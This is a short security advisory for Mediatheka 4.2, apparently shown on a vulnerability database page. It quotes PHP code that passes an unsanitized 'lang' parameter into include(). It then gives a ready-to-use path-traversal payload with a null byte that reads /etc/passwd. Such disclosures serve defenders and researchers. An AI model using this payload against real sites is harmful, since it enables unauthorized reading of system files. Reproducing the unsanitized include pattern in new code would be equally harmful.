Lucene search

Mediatheka 4.2 Local File Inclusion

🗓️ 15 Dec 2008 00:00:00Reported by OsirysType

packetstorm🔗 packetstormsecurity.com👁 14 Views

Mediatheka 4.2 Local File Inclusion vulnerabilit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`[START]  
  
#########################################################################################  
[0x01] Informations:  
  
Script : Mediatheka 4.2  
Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1  
Vulnerability : Local File Inclusion  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay, str0ke  
  
#########################################################################################  
[0x02] Bug:[Local File Inclusion]  
######  
  
Bugged file is: /[path]/index.php  
  
[CODE]  
  
if(isset($_GET['lang']))  
$lang = $_GET['lang'];  
else  
$lang = 'en';  
include("langs/$lang.php");  
  
[/CODE]  
  
  
[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include]  
../../../../../../../../../../../etc/passwd%00  
#########################################################################################  
  
[/END]  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Dec 2008 00:00Current

0.1Low risk

Vulners AI Score0.1